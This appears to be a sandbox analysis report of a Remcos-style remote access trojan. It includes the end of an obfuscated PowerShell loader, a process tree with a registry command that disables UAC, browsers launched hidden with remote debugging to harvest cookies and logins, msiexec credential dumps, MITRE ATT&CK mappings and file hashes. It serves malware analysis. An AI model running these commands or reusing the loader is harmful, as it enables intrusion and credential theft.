'Hypn$Sk.laKommlQue tSexteLapir ornNedgaHip.rMa si UndaNrhe.SomaH,edoeFun,aRobad D,ne nterIncos Gue[Anim$ SanDrod eGrilkMa rlFrihaOp as FibsCoale T or uti ytnS.rigNoneeAxiarPremsFae ] Sla=F nd$FalsS Valc C moO.hor Es.pSkoviAfs uOenir riguKul sTage ');$Konversabel=Outdoor 'Un e$CollaSi,dlA det PreeTangrWo,kn Orda CourTi,bi Cluasneg. C sDTeoro FilwT rtn aml rctoWeataCassd MisFhandiinddlpandeRetr( egr$ rofIIndin latf CheoSickrVarpmolieaU jvlPro iC mmtMadeiLaureRos.sKrei,Unmo$ SnaASprec SmoiFlagd ConyDeni).eks ';$Acidy=$Skytler;Correality69 (Outdoor 'Wist$h,etGDuruLFor o ontB CowA,mpiLFrow:RullsIsohMshifaLuftADaabEDozeLIlanE eklKVejbtVisur U eoMagnnTjreIlis KUnde=Li n(D nsTHeadEGletsEye tFlin-NugaPWrotAOpvetregiHVogi Rud $.jtia apsc onoi PildDkfaymem )Ejef ');while (!$Smaaelektronik) {Correality69 (Outdoor 'Kegl$yodegKalkl ModoSkrtbAbceaStril Reg:SideF asso turr SchbKikkr HepuKahagDecoeOp,utVi dsNerv=suba$RolltBedrrEr ku FroeAbso ') ;Correality69 $Konversabel;Correality69 (Outdoor ' ResSSeritNeurALoc rSoret Sky-GlumSY,llL RocEAlleERer P Pom Unse4Over ');Correality69 (Outdoor 'Ser $ BlugNippL ObjOSyvmbReplaUndelBet.: eleS.oremNe,va Co aUndieTr eLKaryEAllak AdsTBoo RDra,oJa snreceIFritk Fau= Red( Witt SkyESchiSRoteT,rov-Se iPFa.oaVa itPo uh .er ua$milsAbrugC iteILredD TykyDrom)Udv ') ;Correality69 (Outdoor 'Rens$SnregS,ntLRdnsOBa gbUnknA ForLSo i:QuadmBjerOHippM NoseNereNle,sTSt eS Ple=R nn$AcergbuttLFid,ONegaBVulkASpisl Dkk:DartB.culL FigA To aSkaimGodfEthinj Ants La e Do +Op,r+ moo%Dru $ReseUeft dRefoSZaratTr,fYStylk SylnsklriTrbeNB ddgMellsC siobackMB flrUns aGabba ityDGuv,e ,nstVrkeSbesl. F rCBronoTageuSufinPagatGenn ') ;$Informalities=$Udstykningsomraadets[$Moments]}$Landboforeningerne=309803;$presubordinationnterschool=30529;Correality69 (Outdoor 'Whit$SainG eoL reaODisoBTempa.etoLKomm:ResebUndelFriliGa.rKAr mkBurme cieSerem tn=taxl Ba.ig IndE a,st ism- c,nc JouOAmbinBedsTsangEnedknFuppTAnal C.ec$,omfA,rocCalu iSystDAb rYMidd ');Correality69 (Outdoor 'Misc$Slukg ForlSprooBearb M daLaurlLayo:S ksCnonphS.mirUndeoCenon ga oAutomSgeraOzons Af.tEsmai Nskx cyl ,ono=Jdek mil[BaraS emiy .yrsGedetRyoteEngamU kn. Li.CstupoBli n In vDem eSailrF.istRfct]Piti:Wi.n: moeFCro r eosoSerimMandBJi gaUnsmsFor,eOpo 6Kapi4ExopSAflytTramr,ongiFor.nUnwrgUnde(Tu,i$ oveBKololAfskiProokHarekA pleKarasSpi.)Numi ');Correality69 (Outdoor 'ryma$ReacgSansL RgeOMystBUnfeA dbulUaf :Fr ts PigIPropDnonrEWeanTSpirAPraglUtyslForseLystR ovvKDo sePoleNSeksESvigr,legNMorgEMechSRepa4 Aar0Vini Sted=Fern ,ngo[ChassTeleyL jrs BroTAyene ritmRe.d. Ta,tt.iaEMundXC.pit D m.Cl geGlimNRotecHalvOHanddDowni FreNAffag orm] edl: tri:KonfAgla.sFul cIndpIViv IEnam.Dokug S gETas tEmirsHydrTExtrR A li ronOnomgAm t(Tuds$S avC aldhOmbrR UdvO CalNServO rfemY,ntAlinasMetaT ,ili Am xTo t) su ');Correality69 (Outdoor 'Vel $ makgE.silShojOUnsebSal A.rcalTrne:HoppYAnt OGarnnFrdin DetaOver1 Dif7Bien0 bib=.lve$Mis.SNo oiM.dddEkseeSkd,T Zw aKa slKompLBodoeUnivRU lbkTaeneHypoNPoineTsu rmen nMurrEAnsgSO dr4Nyan0tric.jernsAnthuFo dBfrynStweeT S.ar Rv,i AppnResoG Und(P,ln$RisalBespaEle.NVrdid,gnobFiltOBondfPenuo RevRSli.e KoaNTremIU,deN T.kg D,pEKierR By nVelse,ppe, rna$Elo,PMetaR Li e ,laSgra UautobSabboDesiR ahDSlabIfangnPartahagatWhipI AmeOFowlnTabin ki THaanE BesRAnkeS HilcSeptHGruno AvaOPyroLRe l)T ng ');Correality69 $Yonna170;"
1⤵
- Network Service Discovery
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:532
- C:\Windows\SysWOW64\msiexec.exe
  "C:\Windows\SysWOW64\msiexec.exe"
  2⤵
  - Blocklisted process makes network request
  - Suspicious use of NtCreateThreadExHideFromDebugger
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2332
- - C:\Windows\SysWOW64\cmd.exe
    /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:948
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
      4⤵
      UAC bypass
      System Location Discovery: System Language Discovery
      Modifies registry key
      PID:3124
- - C:\Program Files\Google\Chrome\Application\Chrome.exe
    --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
    3⤵
    - Uses browser remote debugging
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of WriteProcessMemory
    PID:4300
  - - C:\Program Files\Google\Chrome\Application\Chrome.exe
      "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffe5a47cc40,0x7ffe5a47cc4c,0x7ffe5a47cc58
      4⤵
      PID:4548
  - - C:\Program Files\Google\Chrome\Application\Chrome.exe
      "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1952,i,12535808303531824796,11238277414862564254,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1948 /prefetch:2
      4⤵
      PID:1264
  - - C:\Program Files\Google\Chrome\Application\Chrome.exe
      "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2116,i,12535808303531824796,11238277414862564254,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2132 /prefetch:3
      4⤵
      PID:2088
  - - C:\Program Files\Google\Chrome\Application\Chrome.exe
      "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2220,i,12535808303531824796,11238277414862564254,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2424 /prefetch:8
      4⤵
      PID:4720
  - - C:\Program Files\Google\Chrome\Application\Chrome.exe
      "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3172,i,12535808303531824796,11238277414862564254,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3184 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:4308
  - - C:\Program Files\Google\Chrome\Application\Chrome.exe
      "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3192,i,12535808303531824796,11238277414862564254,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3332 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:3280
  - - C:\Program Files\Google\Chrome\Application\Chrome.exe
      "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4564,i,12535808303531824796,11238277414862564254,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4584 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:4024
  - - C:\Program Files\Google\Chrome\Application\Chrome.exe
      "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4692,i,12535808303531824796,11238277414862564254,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4732 /prefetch:8
      4⤵
      PID:3668
  - - C:\Program Files\Google\Chrome\Application\Chrome.exe
      "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4728,i,12535808303531824796,11238277414862564254,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4840 /prefetch:8
      4⤵
      PID:1220
- - C:\Windows\SysWOW64\msiexec.exe
    C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\feazompky"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:2412
- - C:\Windows\SysWOW64\msiexec.exe
    C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\qygspeammpvtz"
    3⤵
    - Accesses Microsoft Outlook accounts
    - System Location Discovery: System Language Discovery
    PID:1780
- - C:\Windows\SysWOW64\msiexec.exe
    C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\satdqxlgaxnyjati"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1676
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
    3⤵
    - Uses browser remote debugging
    - Enumerates system info in registry
    - Modifies registry class
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    PID:2384
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffe5a3346f8,0x7ffe5a334708,0x7ffe5a334718
      4⤵
      PID:2468
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2060,490395145043719297,10834916241637465579,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2072 /prefetch:2
      4⤵
      PID:1664
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2060,490395145043719297,10834916241637465579,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 /prefetch:3
      4⤵
      PID:3524
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2060,490395145043719297,10834916241637465579,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2960 /prefetch:8
      4⤵
      PID:2268
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2060,490395145043719297,10834916241637465579,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:1396
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2060,490395145043719297,10834916241637465579,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3388 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:548
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2060,490395145043719297,10834916241637465579,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5492 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:1748
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2060,490395145043719297,10834916241637465579,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5504 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:4836

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:4448

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:340

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4284

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Modify Authentication Process

T1556

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Authentication Process

T1556

Modify Registry

T1112

Credential Access

Modify Authentication Process

T1556

Steal Web Session Cookie

T1539

Discovery

Network Service Discovery

T1046

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Email Collection

T1114

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\remcos\logs.dat

Filesize
144B

MD5
0a58a276df0d5c7801b713e1c74a1137

SHA1
a81a4f47981f2e1432652da490a526bf6e08fc28

SHA256
c2b8e0e9b8e03c98a4966ee6ecd059828917f3775e90b0832dfbd7c97edecb5c

SHA512
605ac59bd1d04371a1517a838a969a9e3595cfe374153c8ee2bfe64195adc76f1610d6176959994d3535f7c8db8fceacb078d18bca4a8be7306bdeb6a4ade702

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
71444def27770d9071039d005d0323b7

SHA1
cef8654e95495786ac9347494f4417819373427e

SHA256
8438eded7f1ab9b4399a069611fe8730226bcdce08fab861d4e8fae6ef621ec9

SHA512
a721af797fd6882e6595b7d9610334f1fb57b809e504452eed4b0d0a32aaf07b81ce007bd51605bec9fcea7ec9f1d8424db1f0f53b65a01126ec4f5980d86034

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat

Filesize
40B

MD5
2b427327b2b72c590604f626787314df

SHA1
7c362406e87bf6700a1842e22aa94fe98a50438b

SHA256
4ebd104cca7df78501c70fb05601b09ea5c0064c887fd8dd90fb570db20d5b16

SHA512
95757c89c680c25e4d73985cb46fcaf5a06586fece91f16249257d2d5041a875902de3048f7ab540bced2f8debbe9769bf8be6401de55ba3f9110cb00394baa2

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat

Filesize
152B

MD5
fe7ce40c4f085a83b38a2f24502647f4

SHA1
5ad1343b4dfc56979c77dbc5153e2b9d9314031f

SHA256
290dd2f149af26987758647821633884ff66a876831f08238044e9be977c2a4d

SHA512
a42b8506a7a6f990bdacb57a017c4f4fc8f71731c0d8a4373411293234997c0df3427426be55f7fb34a3ef65c660c374b4acb95662756bb92625f0d9dceb4ca1

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat

Filesize
152B

MD5
c7f53b253b6c0fe2bf9612d1c9f78a5c

SHA1
e5fe22204af452829e16a3f2587354979080004f

SHA256
15cae278716e0bd0f259fc6a6a41bbc798203d297e1b32bf8343065ea5330a7b

SHA512
1fa8430051894be2bc55ecd9b060b9375fc914107a2e0c89e316652c8c6c22ef13a78f90d6895c1fac977b5db4c7d44b2eef942867cb73f864070d2e350c2177

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat

Filesize
152B

MD5
3ea6c28f0a887850945daf902e70c89f

SHA1
4a66c88580b20108c30cf2f7bc6b7b57c6035e38

SHA256
d2592ec79e3cd21e751c704245a482ef297ce95a7550d16841199814abd85ed3

SHA512
04acd7299cf01df83819ea667715917fcdcd4e82963712f8324b27fa95165c7dc7862ee0ac80cf43dc0d02c48fb8f009ee35b8a1a09958eb34b277114a4e8b6c

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\throttle_store.dat

Filesize
20B

MD5
9e4e94633b73f4a7680240a0ffd6cd2c

SHA1
e68e02453ce22736169a56fdb59043d33668368f

SHA256
41c91a9c93d76295746a149dce7ebb3b9ee2cb551d84365fff108e59a61cc304

SHA512
193011a756b2368956c71a9a3ae8bc9537d99f52218f124b2e64545eeb5227861d372639052b74d0dd956cb33ca72a9107e069f1ef332b9645044849d14af337

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Code Cache\js\index

Filesize
24B

MD5
54cb446f628b2ea4a5bce5769910512e

SHA1
c27ca848427fe87f5cf4d0e0e3cd57151b0d820d

SHA256
fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d

SHA512
8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Code Cache\js\index-dir\the-real-index

Filesize
48B

MD5
9a549e298df04e55963b83835de8043f

SHA1
747c34122b964d8a816a2090d74a03420024130d

SHA256
6b264fa008d03135c47b4d48fd3400d3948bc0b13c3a04a22dfbe42885a9420f

SHA512
8db8085bf28b02e00d8b287329500fcf69d6bbc97f44c247f78dcd7f6b93fda5adbd378d26dfe66bbe3c410de2f22f699d06dd5fd1f3bc8759dce6a0ff5b67c0

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Code Cache\wasm\index-dir\the-real-index

Filesize
48B

MD5
d0257e21024b5a2bb794f9c15244ac18

SHA1
f0c090789fb72498ee1d57510578d246369db11a

SHA256
52ee2be60dff7a868bc9aedfa5a4577ed1f24e3c1c10dfbd34af1f28c0c551a1

SHA512
2968d4907085d4a13f7ade642f5fd4e395f8c6d0696e9c1694d39bb342883380343f7388efd14ba7b89265a2c3534148f218a13ba0dcb67400a571cce9b830cc

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Favicons

Filesize
20KB

MD5
b40e1be3d7543b6678720c3aeaf3dec3

SHA1
7758593d371b07423ba7cb84f99ebe3416624f56

SHA256
2db221a44885c046a4b116717721b688f9a026c4cae3a17cf61ba9bef3ad97f4

SHA512
fb0664c1c83043f7c41fd0f1cc0714d81ecd71a07041233fb16fefeb25a3e182a77ac8af9910eff81716b1cceee8a7ee84158a564143b0e0d99e00923106cc16

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\GPUCache\index

Filesize
256KB

MD5
e9eef2f5131ccf9ddd9f71f2c808a42f

SHA1
35a1a403fb33535a98c41ae4a947af6b432e8706

SHA256
ce125e6b411e787ad3815c50fb115a11a7eb9b13772a88187f425d26c2d3d5ee

SHA512
c0317edad42544ff34330b94862d5bfc726391cac4d89b1dfca2e3d7f9807762205465a3d9659c724f5e1c28baaf9c41868d47abf02d848f7144a15cf28e2d6f

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\History

Filesize
192KB

MD5
d30bfa66491904286f1907f46212dd72

SHA1
9f56e96a6da2294512897ea2ea76953a70012564

SHA256
25bee9c6613b6a2190272775a33471a3280bd9246c386b72d872dc6d6dd90907

SHA512
44115f5aaf16bd3c8767bfb5610eba1986369f2e91d887d20a9631807c58843434519a12c9fd23af38c6adfed4dbf8122258279109968b37174a001320839237

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Local Storage\leveldb\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Local Storage\leveldb\LOG

Filesize
275B

MD5
558bb29dae4a8b07973aac303637b0bb

SHA1
4c32f901512f344ac360da4ee9b56e111c9ddd08

SHA256
4229d38fecf0d3316666a7e3a6b64016a6c53266f8c8fa0bd0f16a80429b6367

SHA512
82f1fa397ed6c2435d36342b6c2d43f958428b8282c825ad8d31607a8e5346ca33fb183f175dd1b84b5a05775a28d7b2edd03a7ef526e57116eb9b8d7a36f7e2

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Local Storage\leveldb\MANIFEST-000001

Filesize
41B

MD5
5af87dfd673ba2115e2fcf5cfdb727ab

SHA1
d5b5bbf396dc291274584ef71f444f420b6056f1

SHA256
f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

SHA512
de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Login Data

Filesize
40KB

MD5
a182561a527f929489bf4b8f74f65cd7

SHA1
8cd6866594759711ea1836e86a5b7ca64ee8911f

SHA256
42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914

SHA512
9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Microsoft Edge.lnk

Filesize
1KB

MD5
34dea3380de396376d774f314190aaaf

SHA1
1185185dace75d169e1c17c0f251f40b54c73e76

SHA256
b0f65c59af94fe10e67fd07624cbd5df055270da9678bdaf0551e3123071a719

SHA512
6d208e00823e95a76fa0270e5c6f07152ba46ee4a2e53be024f6120599f7643f8df9fbed4454c226f1c0132b173477ecff3cdb3106a51f6622e641955962aed5

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Network\Cookies

Filesize
20KB

MD5
df050a1721162c145b039ca4d297a857

SHA1
485c47f84d6d04e02dfddfae6ff4175bc43a7c52

SHA256
4f1242c8f6bef6cca400b90d432611b4bf8b5dee446e3a320fa25569787dd4ec

SHA512
c61e51d674744bd61bb0528196609bf2c8ff121174471097df48a441dab5674b4e59d36a4e50c56b492d9b476446f0f810d20bae6d2a12d488f4c2211f492386

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Preferences

Filesize
5KB

MD5
512eba00322ecc0f16e60c88717ef4ea

SHA1
b9972094ab72611c9965f8013901e76bcd5b342d

SHA256
3b12e8bf0f4aac388a3bc55723ef48dd5788134c02910c213084e868abb9d22d

SHA512
30ea741fc2f560a6f5fb1474c227aa6d240300edf326bf9a1d7480fac6c2b3f2befdbb219e3d789d5c447bb19e12843551a425f4fac89257c0a5d334ffda4462

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Preferences

Filesize
1KB

MD5
03f5b0d0cde36047423d3f5744da6aec

SHA1
76afd3c804078639efd8db85925aaff22cd7eabd

SHA256
9047f92d0844c71ca1e579e82ac66980b998ea13606175c4094b37dd4c515745

SHA512
b4958125b5bda3be2b898ea7cf4580c82585f41ebdfb8859575dfc0bdd851cd206d12c268bfe2b0cd29b3a32415c012a03040a17800c14ce525188be61def59f

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Secure Preferences

Filesize
24KB

MD5
72fb8fdc79e886886d9cc89b88ef11db

SHA1
b602840b49b5e657eb4f9cab689940c94179ebc4

SHA256
623fb553bc909b8b591b994a232f3361b993a75d89d3374fa433af91ce63dfea

SHA512
0ac23f265781a01f7ab0434e4dbb9e1af441cd0227d317af3f9ab436a44585321b209e167bbabc7461e28407dde3ba3519d67c44d6f1762ad0fa4f151dd82f92

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Secure Preferences

Filesize
15KB

MD5
ebc04efe08c5b479d966dcc4098ad9fd

SHA1
982c038afc8f5c796145ad9f244dd630ed49ed85

SHA256
0cff7fb1fa385668dd0006c0ae569a42ade53e94f948aef3092a176482374144

SHA512
a8d8f13c25f0c8c3e2576043c84aa4224a188483dcef98d8edb9bc0c83d4232e74e444aba2565a7c76192fc3ad71de2ed4c6b9ec68426f16eee788d065bf143b

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Service Worker\Database\000003.log

Filesize
241B

MD5
9082ba76dad3cf4f527b8bb631ef4bb2

SHA1
4ab9c4a48c186b029d5f8ad4c3f53985499c21b0

SHA256
bff851dedf8fc3ce1f59e7bcd3a39f9e23944bc7e85592a94131e20fd9902ddd

SHA512
